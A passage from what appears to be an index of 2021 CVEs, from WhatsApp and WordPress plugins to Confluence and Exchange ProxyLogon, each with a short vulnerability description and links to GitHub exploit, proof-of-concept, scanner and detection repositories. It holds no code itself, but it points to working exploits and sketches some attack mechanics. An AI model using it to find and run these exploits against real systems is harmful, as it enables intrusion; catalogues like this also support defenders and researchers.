- [Satheesh575555/Openssl_1_1_0_CVE-2021-23841](https://github.com/Satheesh575555/Openssl_1_1_0_CVE-2021-23841)

### CVE-2021-24027 (2021-04-06)

A cache configuration issue prior to WhatsApp for Android v2.21.4.18 and WhatsApp Business for Android v2.21.4.18 may have allowed a third party with access to the device’s external storage to read cached TLS material.

- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm)

### CVE-2021-24084 (2021-02-25)

Windows Mobile Device Management Information Disclosure Vulnerability

- [Jeromeyoung/CVE-2021-24084](https://github.com/Jeromeyoung/CVE-2021-24084)
- [exploitblizzard/WindowsMDM-LPE-0Day](https://github.com/exploitblizzard/WindowsMDM-LPE-0Day)

### CVE-2021-24085 (2021-02-25)

Microsoft Exchange Server Spoofing Vulnerability

- [sourceincite/CVE-2021-24085](https://github.com/sourceincite/CVE-2021-24085)

### CVE-2021-24086 (2021-02-25)

Windows TCP/IP Denial of Service Vulnerability

- [0vercl0k/CVE-2021-24086](https://github.com/0vercl0k/CVE-2021-24086)
- [lisinan988/CVE-2021-24086-exp](https://github.com/lisinan988/CVE-2021-24086-exp)

### CVE-2021-24096 (2021-02-25)

Windows Kernel Elevation of Privilege Vulnerability

- [FunPhishing/CVE-2021-24096](https://github.com/FunPhishing/CVE-2021-24096)

### CVE-2021-24098 (2021-02-25)

Windows Console Driver Denial of Service Vulnerability

- [waleedassar/CVE-2021-24098](https://github.com/waleedassar/CVE-2021-24098)

### CVE-2021-24145 (2021-03-18)

Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP files to be uploaded by an administrator by using the 'text/csv' content-type in the request.

- [dnr6419/CVE-2021-24145](https://github.com/dnr6419/CVE-2021-24145)

### CVE-2021-24155 (2021-04-05)

The WordPress Backup and Migrate Plugin – Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.

- [0dayNinja/CVE-2021-24155.rb](https://github.com/0dayNinja/CVE-2021-24155.rb)

### CVE-2021-24160 (2021-04-05)

In the Responsive Menu (free and Pro) WordPress plugins before 4.0.4, subscribers could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site.

- [hnthuan1998/CVE-2021-24160](https://github.com/hnthuan1998/CVE-2021-24160)
- [hnthuan1998/Exploit-CVE-2021-24160](https://github.com/hnthuan1998/Exploit-CVE-2021-24160)

### CVE-2021-24356 (2021-06-14)

In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites.

- [RandomRobbieBF/CVE-2021-24356](https://github.com/RandomRobbieBF/CVE-2021-24356)

### CVE-2021-24499 (2021-08-09)

The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.

- [j4k0m/CVE-2021-24499](https://github.com/j4k0m/CVE-2021-24499)
- [hh-hunter/cve-2021-24499](https://github.com/hh-hunter/cve-2021-24499)
- [jytmX/CVE-2021-24499](https://github.com/jytmX/CVE-2021-24499)

### CVE-2021-24507 (2021-08-09)

The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX actions (available to both unauthenticated and authenticated users) before using them in a SQL statement, leading to SQL Injection issues.

- [RandomRobbieBF/CVE-2021-24507](https://github.com/RandomRobbieBF/CVE-2021-24507)

### CVE-2021-24545 (2021-10-11)

The WP HTML Author Bio WordPress plugin through 1.2.0 does not sanitise the HTML allowed in the Bio of users, allowing them to use malicious JavaScript code, which will be executed when anyone visits a post in the frontend made by such a user. As a result, a user with a role as low as author could perform Cross-Site Scripting attacks against users, which could potentially lead to privilege escalation when an admin views the related post(s).

- [V35HR4J/CVE-2021-24545](https://github.com/V35HR4J/CVE-2021-24545)
- [dnr6419/CVE-2021-24545](https://github.com/dnr6419/CVE-2021-24545)

### CVE-2021-24563 (2021-10-11)

The Frontend Uploader WordPress plugin through 1.3.2 does not prevent HTML files from being uploaded via its form, allowing unauthenticated users to upload a malicious HTML file containing JavaScript, for example, which will be triggered when someone accesses the file directly.

- [V35HR4J/CVE-2021-24563](https://github.com/V35HR4J/CVE-2021-24563)

### CVE-2021-24647 (2021-11-08)

The Registration Forms – User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing an unauthenticated attacker to log in as any user on the site by only knowing their user ID or username.

- [RandomRobbieBF/CVE-2021-24647](https://github.com/RandomRobbieBF/CVE-2021-24647)

### CVE-2021-24741 (2021-09-20)

The Support Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.

- [dldygnl/CVE-2021-24741](https://github.com/dldygnl/CVE-2021-24741)

### CVE-2021-24750 (2021-12-21)

The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.

- [fimtow/CVE-2021-24750](https://github.com/fimtow/CVE-2021-24750)

### CVE-2021-24807 (2021-11-08)

The Support Board WordPress plugin before 3.3.5 allows authenticated (Agent+) users to perform Cross-Site Scripting attacks by placing a payload in the notes field; when an administrator or any authenticated user goes to the chat, the XSS will be automatically executed.

- [dldygnl/CVE-2021-24807](https://github.com/dldygnl/CVE-2021-24807)

### CVE-2021-24884 (2021-10-25)

The Formidable Form Builder WordPress plugin before 4.09.05 allows injection of certain HTML tags like `<audio>`, `<video>`, `<img>`, `<a>` and `<button>`. This could allow an unauthenticated, remote attacker to exploit an HTML injection by injecting a malicious link. The HTML injection may trick authenticated users into following the link. If the link gets clicked, JavaScript code can be executed. The vulnerability is due to insufficient sanitization of the "data-frmverify" tag for links in the web-based entry inspection page of affected systems. A successful exploitation in combination with CSRF could allow the attacker to perform arbitrary actions on an affected system with the privileges of the user. These actions include stealing the user's account by changing their password or allowing attackers to submit their own code through an authenticated user, resulting in Remote Code Execution. If an authenticated user who is able to edit WordPress PHP code in any way clicks the malicious link, PHP code can be edited.

- [S1lkys/CVE-2021-24884](https://github.com/S1lkys/CVE-2021-24884)

### CVE-2021-24917 (2021-12-06)

The WPS Hide Login WordPress plugin before 1.9.1 has a bug which allows an unauthenticated user to obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php.

- [dikalasenjadatang/CVE-2021-24917](https://github.com/dikalasenjadatang/CVE-2021-24917)
- [Cappricio-Securities/CVE-2021-24917](https://github.com/Cappricio-Securities/CVE-2021-24917)

### CVE-2021-24959 (2022-03-14)

The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated user, allowing them to perform SQL injection attacks.

- [RandomRobbieBF/CVE-2021-24959](https://github.com/RandomRobbieBF/CVE-2021-24959)

### CVE-2021-25003 (2022-03-14)

The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.

- [biulove0x/CVE-2021-25003](https://github.com/biulove0x/CVE-2021-25003)

### CVE-2021-25032 (2022-01-10)

The PublishPress Capabilities WordPress plugin before 2.3.1 and PublishPress Capabilities Pro WordPress plugin before 2.3.1 do not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and do not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role, and make any newly registered user an administrator.

- [RandomRobbieBF/CVE-2021-25032](https://github.com/RandomRobbieBF/CVE-2021-25032)

### CVE-2021-25076 (2022-01-24)

The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting.

- [0xAbbarhSF/CVE-2021-25076](https://github.com/0xAbbarhSF/CVE-2021-25076)

### CVE-2021-25094 (2022-04-25)

The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass the extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.

- [darkpills/CVE-2021-25094-tatsu-preauth-rce](https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce)
- [TUANB4DUT/typehub-exploiter](https://github.com/TUANB4DUT/typehub-exploiter)
- [xdx57/CVE-2021-25094](https://github.com/xdx57/CVE-2021-25094)
- [experimentalcrow1/TypeHub-Exploiter](https://github.com/experimentalcrow1/TypeHub-Exploiter)

### CVE-2021-25162 (2021-03-30)

A remote execution of arbitrary commands vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.

- [twentybel0w/CVE-2021-25162](https://github.com/twentybel0w/CVE-2021-25162)

### CVE-2021-25253 (2021-04-13)

An improper access control vulnerability in Trend Micro Apex One, Trend Micro Apex One as a Service and OfficeScan XG SP1 on a resource used by the service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

- [msd0pe-1/CVE-2021-25253](https://github.com/msd0pe-1/CVE-2021-25253)

### CVE-2021-25281 (2021-02-27)

An issue was discovered in SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.

- [Immersive-Labs-Sec/CVE-2021-25281](https://github.com/Immersive-Labs-Sec/CVE-2021-25281)

### CVE-2021-25374 (2021-04-09)

An improper authorization vulnerability in the Samsung Members "samsungrewards" scheme for deeplinks in versions 2.4.83.9 in Android O(8.1) and below, and 3.9.00.9 in Android P(9.0) and above, allows remote attackers to access user data related to the Samsung Account.

- [WithSecureLabs/CVE-2021-25374_Samsung-Account-Access](https://github.com/WithSecureLabs/CVE-2021-25374_Samsung-Account-Access)

### CVE-2021-25461 (2021-09-09)

An improper length check in APAService prior to SMR Sep-2021 Release 1 results in a stack-based buffer overflow.

- [bkojusner/CVE-2021-25461](https://github.com/bkojusner/CVE-2021-25461)

### CVE-2021-25641 (2021-05-29)

Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo versions before 2.7.8 or 2.6.9, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, i.e., not following the server's instruction. This means that if a weak deserializer such as Kryo or FST is somehow in code scope (e.g. if Kryo is somehow a part of a dependency), a remote unauthenticated attacker can tell the Provider to use the weak deserializer, and then proceed to exploit it.

- [Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept](https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept)
- [l0n3rs/CVE-2021-25641](https://github.com/l0n3rs/CVE-2021-25641)

### CVE-2021-25642 (2022-08-25)

ZKConfigurationStore which is optionally used by CapacityScheduler of Apache Hadoop YARN deserializes data obtained from ZooKeeper without validation. An attacker having access to ZooKeeper can run arbitrary commands as YARN user by exploiting this. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.4 or later (containing YARN-11126) if ZKConfigurationStore is used.

- [safe3s/CVE-2021-25642](https://github.com/safe3s/CVE-2021-25642)

### CVE-2021-25646 (2021-01-29)

Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.

- [yaunsky/cve-2021-25646](https://github.com/yaunsky/cve-2021-25646)
- [lp008/CVE-2021-25646](https://github.com/lp008/CVE-2021-25646)
- [Ormicron/CVE-2021-25646-GUI](https://github.com/Ormicron/CVE-2021-25646-GUI)
- [Vulnmachines/Apache-Druid-CVE-2021-25646](https://github.com/Vulnmachines/Apache-Druid-CVE-2021-25646)
- [1n7erface/PocList](https://github.com/1n7erface/PocList)
- [givemefivw/CVE-2021-25646](https://github.com/givemefivw/CVE-2021-25646)
- [j2ekim/CVE-2021-25646](https://github.com/j2ekim/CVE-2021-25646)
- [luobai8/CVE-2021-25646-exp](https://github.com/luobai8/CVE-2021-25646-exp)

### CVE-2021-25679 (2021-04-20)

The AdTran Personal Phone Manager software is vulnerable to authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. NOTE: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched.

- [3ndG4me/AdTran-Personal-Phone-Manager-Vulns](https://github.com/3ndG4me/AdTran-Personal-Phone-Manager-Vulns)

### CVE-2021-25735 (2021-09-06)

A security issue was discovered in kube-apiserver that could allow node updates to bypass a Validating Admission Webhook. Clusters are only affected by this vulnerability if they run a Validating Admission Webhook for Nodes that denies admission based at least partially on the old state of the Node object. Validating Admission Webhook does not observe some previous fields.

- [darryk10/CVE-2021-25735](https://github.com/darryk10/CVE-2021-25735)

### CVE-2021-25741 (2021-09-20)

A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem.

- [Betep0k/CVE-2021-25741](https://github.com/Betep0k/CVE-2021-25741)
- [cdxiaodong/CVE-2021-25741](https://github.com/cdxiaodong/CVE-2021-25741)

### CVE-2021-25790 (2021-07-23)

Multiple stored cross-site scripting (XSS) vulnerabilities in the "Register" module of House Rental and Property Listing 1.0 allow authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in all text fields except for Phone Number and Alternate Phone Number.

- [MrCraniums/CVE-2021-25790-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25790-Multiple-Stored-XSS)

### CVE-2021-25791 (2021-07-23)

Multiple stored cross-site scripting (XSS) vulnerabilities in the "Update Profile" module of Online Doctor Appointment System 1.0 allow authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in the First Name, Last Name, and Address text fields.

- [MrCraniums/CVE-2021-25791-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25791-Multiple-Stored-XSS)

### CVE-2021-25801 (2021-07-26)

A buffer overflow vulnerability in the __Parse_indx component of VideoLAN VLC Media Player 3.0.11 allows attackers to cause an out-of-bounds read via a crafted .avi file.

- [DShankle/VLC_CVE-2021-25801_Analysis](https://github.com/DShankle/VLC_CVE-2021-25801_Analysis)

### CVE-2021-25804 (2021-07-26)

A NULL-pointer dereference in "Open" in avi.c of VideoLAN VLC Media Player 3.0.11 can cause a denial of service (DoS) in the application.

- [DShankle/VLC_CVE-2021-25804_Analysis](https://github.com/DShankle/VLC_CVE-2021-25804_Analysis)

### CVE-2021-26084 (2021-08-30)

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.

- [crowsec-edtech/CVE-2021-26084](https://github.com/crowsec-edtech/CVE-2021-26084)
- [alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC)
- [dinhbaouit/CVE-2021-26084](https://github.com/dinhbaouit/CVE-2021-26084)
- [JKme/CVE-2021-26084](https://github.com/JKme/CVE-2021-26084)
- [hev0x/CVE-2021-26084_Confluence](https://github.com/hev0x/CVE-2021-26084_Confluence)
- [prettyrecon/CVE-2021-26084_Confluence](https://github.com/prettyrecon/CVE-2021-26084_Confluence)
- [0xf4n9x/CVE-2021-26084](https://github.com/0xf4n9x/CVE-2021-26084)
- [Vulnmachines/Confluence_CVE-2021-26084](https://github.com/Vulnmachines/Confluence_CVE-2021-26084)
- [Osyanina/westone-CVE-2021-26084-scanner](https://github.com/Osyanina/westone-CVE-2021-26084-scanner)
- [CrackerCat/CVE-2021-26084](https://github.com/CrackerCat/CVE-2021-26084)
- [b1gw00d/CVE-2021-26084](https://github.com/b1gw00d/CVE-2021-26084)
- [taythebot/CVE-2021-26084](https://github.com/taythebot/CVE-2021-26084)
- [bcdannyboy/CVE-2021-26084_GoPOC](https://github.com/bcdannyboy/CVE-2021-26084_GoPOC)
- [smallpiggy/cve-2021-26084-confluence](https://github.com/smallpiggy/cve-2021-26084-confluence)
- [maskerTUI/CVE-2021-26084](https://github.com/maskerTUI/CVE-2021-26084)
- [BeRserKerSec/CVE-2021-26084-Nuclei-template](https://github.com/BeRserKerSec/CVE-2021-26084-Nuclei-template)
- [p0nymc1/CVE-2021-26084](https://github.com/p0nymc1/CVE-2021-26084)
- [Loneyers/CVE-2021-26084](https://github.com/Loneyers/CVE-2021-26084)
- [Xc1Ym/cve_2021_26084](https://github.com/Xc1Ym/cve_2021_26084)
- [wolf1892/confluence-rce-poc](https://github.com/wolf1892/confluence-rce-poc)
- [smadi0x86/CVE-2021-26084](https://github.com/smadi0x86/CVE-2021-26084)
- [kkin77/CVE-2021-26084-Confluence-OGNL](https://github.com/kkin77/CVE-2021-26084-Confluence-OGNL)
- [1ZRR4H/CVE-2021-26084](https://github.com/1ZRR4H/CVE-2021-26084)
- [GlennPegden2/cve-2021-26084-confluence](https://github.com/GlennPegden2/cve-2021-26084-confluence)
- [toowoxx/docker-confluence-patched](https://github.com/toowoxx/docker-confluence-patched)
- [nizar0x1f/CVE-2021-26084-patch-](https://github.com/nizar0x1f/CVE-2021-26084-patch-)
- [attacker-codeninja/CVE-2021-26084](https://github.com/attacker-codeninja/CVE-2021-26084)
- [ludy-dev/CVE-2021-26084_PoC](https://github.com/ludy-dev/CVE-2021-26084_PoC)
- [wdjcy/CVE-2021-26084](https://github.com/wdjcy/CVE-2021-26084)
- [orangmuda/CVE-2021-26084](https://github.com/orangmuda/CVE-2021-26084)
- [TheclaMcentire/CVE-2021-26084_Confluence](https://github.com/TheclaMcentire/CVE-2021-26084_Confluence)
- [Jun-5heng/CVE-2021-26084](https://github.com/Jun-5heng/CVE-2021-26084)
- [lleavesl/CVE-2021-26084](https://github.com/lleavesl/CVE-2021-26084)
- [quesodipesto/conflucheck](https://github.com/quesodipesto/conflucheck)
- [30579096/Confluence-CVE-2021-26084](https://github.com/30579096/Confluence-CVE-2021-26084)
- [ZZ-SOCMAP/CVE-2021-26084](https://github.com/ZZ-SOCMAP/CVE-2021-26084)
- [vpxuser/CVE-2021-26084-EXP](https://github.com/vpxuser/CVE-2021-26084-EXP)
- [nahcusira/CVE-2021-26084](https://github.com/nahcusira/CVE-2021-26084)
- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)

### CVE-2021-26085 (2021-08-03)

Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.

- [ColdFusionX/CVE-2021-26085](https://github.com/ColdFusionX/CVE-2021-26085)

### CVE-2021-26086 (2021-08-16)

Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.

- [Jeromeyoung/CVE-2021-26086](https://github.com/Jeromeyoung/CVE-2021-26086)
- [ColdFusionX/CVE-2021-26086](https://github.com/ColdFusionX/CVE-2021-26086)

### CVE-2021-26088 (2021-07-12)

An improper authentication vulnerability in FSSO Collector version 5.0.295 and below may allow an unauthenticated user to bypass an FSSO firewall policy and access the protected network by sending specially crafted UDP login notification packets.

- [theogobinet/CVE-2021-26088](https://github.com/theogobinet/CVE-2021-26088)

### CVE-2021-26102
- [SleepyCofe/CVE-2021-26102](https://github.com/SleepyCofe/CVE-2021-26102)

### CVE-2021-26121
- [sourceincite/CVE-2021-26121](https://github.com/sourceincite/CVE-2021-26121)

### CVE-2021-26258 (2022-05-12)

Improper access control for the Intel(R) Killer(TM) Control Center software before version 2.4.3337.0 may allow an authorized user to potentially enable escalation of privilege via local access.

- [zwclose/CVE-2021-26258](https://github.com/zwclose/CVE-2021-26258)

### CVE-2021-26295 (2021-03-22)

Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.

- [yumusb/CVE-2021-26295](https://github.com/yumusb/CVE-2021-26295)
- [rakjong/CVE-2021-26295-Apache-OFBiz](https://github.com/rakjong/CVE-2021-26295-Apache-OFBiz)
- [dskho/CVE-2021-26295](https://github.com/dskho/CVE-2021-26295)
- [coolyin001/CVE-2021-26295--](https://github.com/coolyin001/CVE-2021-26295--)
- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc)

### CVE-2021-26411 (2021-03-11)

Internet Explorer Memory Corruption Vulnerability

- [CrackerCat/CVE-2021-26411](https://github.com/CrackerCat/CVE-2021-26411)

### CVE-2021-26414 (2021-06-08)

Windows DCOM Server Security Feature Bypass

- [Nels2/dcom_10036_Solver](https://github.com/Nels2/dcom_10036_Solver)

### CVE-2021-26415 (2021-04-13)

Windows Installer Elevation of Privilege Vulnerability

- [adenkiewicz/CVE-2021-26415](https://github.com/adenkiewicz/CVE-2021-26415)

### CVE-2021-26690 (2021-06-10)

In Apache HTTP Server versions 2.4.0 to 2.4.46, a specially crafted Cookie header handled by mod_session can cause a NULL pointer dereference and crash, leading to a possible Denial of Service.

- [dja2TaqkGEEfA45/CVE-2021-26690](https://github.com/dja2TaqkGEEfA45/CVE-2021-26690)

### CVE-2021-26691 (2021-06-10)

In Apache HTTP Server versions 2.4.0 to 2.4.46, a specially crafted SessionHeader sent by an origin server could cause a heap overflow.

- [dja2TaqkGEEfA45/CVE-2021-26691](https://github.com/dja2TaqkGEEfA45/CVE-2021-26691)

### CVE-2021-26700 (2021-02-25)

Visual Studio Code npm-script Extension Remote Code Execution Vulnerability

- [jackadamson/CVE-2021-26700](https://github.com/jackadamson/CVE-2021-26700)
- [june-in-exile/CVE-2021-26700](https://github.com/june-in-exile/CVE-2021-26700)

### CVE-2021-26708 (2021-02-05)

A local privilege escalation was discovered in the Linux kernel before 5.10.13. Multiple race conditions in the AF_VSOCK implementation are caused by wrong locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in the commits that added VSOCK multi-transport support.

- [jordan9001/vsock_poc](https://github.com/jordan9001/vsock_poc)
- [azpema/CVE-2021-26708](https://github.com/azpema/CVE-2021-26708)

### CVE-2021-26714 (2021-03-29)

The Enterprise License Manager portal in Mitel MiContact Center Enterprise before 9.4 could allow a user to access restricted files and folders due to insufficient access control. A successful exploit could allow an attacker to view and modify application data via Directory Traversal.

- [PwCNO-CTO/CVE-2021-26714](https://github.com/PwCNO-CTO/CVE-2021-26714)

### CVE-2021-26814 (2021-03-06)

The Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via the /manager/files URI. An authenticated user of the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.

- [WickdDavid/CVE-2021-26814](https://github.com/WickdDavid/CVE-2021-26814)
- [CYS4srl/CVE-2021-26814](https://github.com/CYS4srl/CVE-2021-26814)
- [paolorabbito/Internet-Security-Project---CVE-2021-26814](https://github.com/paolorabbito/Internet-Security-Project---CVE-2021-26814)

### CVE-2021-26828 (2021-06-11)

OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm.

- [hev0x/CVE-2021-26828_ScadaBR_RCE](https://github.com/hev0x/CVE-2021-26828_ScadaBR_RCE)

### CVE-2021-26832 (2021-04-14)

Cross-Site Scripting (XSS) in the "Reset Password" page form of Priority Enterprise Management System v8.00 allows attackers to execute JavaScript on behalf of the victim by sending a malicious URL or directing the victim to a malicious site.

- [NagliNagli/CVE-2021-26832](https://github.com/NagliNagli/CVE-2021-26832)

### CVE-2021-26855 (2021-03-02)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [sgnls/exchange-0days-202103](https://github.com/sgnls/exchange-0days-202103)
- [soteria-security/HAFNIUM-IOC](https://github.com/soteria-security/HAFNIUM-IOC)
- [cert-lv/exchange_webshell_detection](https://github.com/cert-lv/exchange_webshell_detection)
- [conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855](https://github.com/conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855)
- [pussycat0x/CVE-2021-26855-SSRF](https://github.com/pussycat0x/CVE-2021-26855-SSRF)
- [La3B0z/CVE-2021-26855-SSRF-Exchange](https://github.com/La3B0z/CVE-2021-26855-SSRF-Exchange)
- [mekhalleh/exchange_proxylogon](https://github.com/mekhalleh/exchange_proxylogon)
- [Yt1g3r/CVE-2021-26855_SSRF](https://github.com/Yt1g3r/CVE-2021-26855_SSRF)
- [hackerxj007/CVE-2021-26855](https://github.com/hackerxj007/CVE-2021-26855)
- [dwisiswant0/proxylogscan](https://github.com/dwisiswant0/proxylogscan)
- [mauricelambert/ExchangeWeaknessTest](https://github.com/mauricelambert/ExchangeWeaknessTest)
- [DCScoder/Exchange_IOC_Hunter](https://github.com/DCScoder/Exchange_IOC_Hunter)
- [srvaccount/CVE-2021-26855-PoC](https://github.com/srvaccount/CVE-2021-26855-PoC)
- [h4x0r-dz/CVE-2021-26855](https://github.com/h4x0r-dz/CVE-2021-26855)
- [alt3kx/CVE-2021-26855_PoC](https://github.com/alt3kx/CVE-2021-26855_PoC)
- [r0xdeadbeef/CVE-2021-26855](https://github.com/r0xdeadbeef/CVE-2021-26855)
- [hackerschoice/CVE-2021-26855](https://github.com/hackerschoice/CVE-2021-26855)
- [SCS-Labs/HAFNIUM-Microsoft-Exchange-0day](https://github.com/SCS-Labs/HAFNIUM-Microsoft-Exchange-0day)
- [KotSec/CVE-2021-26855-Scanner](https://github.com/KotSec/CVE-2021-26855-Scanner)
- [hakivvi/proxylogon](https://github.com/hakivvi/proxylogon)
- [ZephrFish/Exch-CVE-2021-26855](https://github.com/ZephrFish/Exch-CVE-2021-26855)
- [mil1200/ProxyLogon-CVE-2021-26855](https://github.com/mil1200/ProxyLogon-CVE-2021-26855)
- [evilashz/ExchangeSSRFtoRCEExploit](https://github.com/evilashz/ExchangeSSRFtoRCEExploit)
- [ZephrFish/Exch-CVE-2021-26855_Priv](https://github.com/ZephrFish/Exch-CVE-2021-26855_Priv)
- [Mr-xn/CVE-2021-26855-d](https://github.com/Mr-xn/CVE-2021-26855-d)
- [RickGeex/ProxyLogon](https://github.com/RickGeex/ProxyLogon)
- [Immersive-Labs-Sec/ProxyLogon](https://github.com/Immersive-Labs-Sec/ProxyLogon)
- [shacojx/Scan-Vuln-CVE-2021-26855](https://github.com/shacojx/Scan-Vuln-CVE-2021-26855)
- [TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit](https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit)
- [p0wershe11/ProxyLogon](https://github.com/p0wershe11/ProxyLogon)
- [shacojx/CVE-2021-26855-exploit-Exchange](https://github.com/shacojx/CVE-2021-26855-exploit-Exchange)
- [catmandx/CVE-2021-26855-Exchange-RCE](https://github.com/catmandx/CVE-2021-26855-Exchange-RCE)
- [hictf/CVE-2021-26855-CVE-2021-27065](https://github.com/hictf/CVE-2021-26855-CVE-2021-27065)
- [praetorian-inc/proxylogon-exploit](https://github.com/praetorian-inc/proxylogon-exploit)
- [Flangvik/SharpProxyLogon](https://github.com/Flangvik/SharpProxyLogon)
- [hosch3n/ProxyVulns](https://github.com/hosch3n/ProxyVulns)
- [Nick-Yin12/106362522](https://github.com/Nick-Yin12/106362522)
- [yaoxiaoangry3/Flangvik](https://github.com/yaoxiaoangry3/Flangvik)
- [thau0x01/poc_proxylogon](https://github.com/thau0x01/poc_proxylogon)
- [1342486672/Flangvik](https://github.com/1342486672/Flangvik)
- [TheDudeD6/ExchangeSmash](https://github.com/TheDudeD6/ExchangeSmash)
- [kh4sh3i/ProxyLogon](https://github.com/kh4sh3i/ProxyLogon)
- [ssrsec/Microsoft-Exchange-RCE](https://github.com/ssrsec/Microsoft-Exchange-RCE)
- [glen-pearson/ProxyLogon-CVE-2021-26855](https://github.com/glen-pearson/ProxyLogon-CVE-2021-26855)
- [MacAsure/cve-2021-26855](https://github.com/MacAsure/cve-2021-26855)
- [timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt](https://github.com/timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt)

### CVE-2021-26856
- [avi8892/CVE-2021-26856](https://github.com/avi8892/CVE-2021-26856)

### CVE-2021-26857 (2021-03-02)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [sirpedrotavares/Proxylogon-exploit](https://github.com/sirpedrotavares/Proxylogon-exploit)

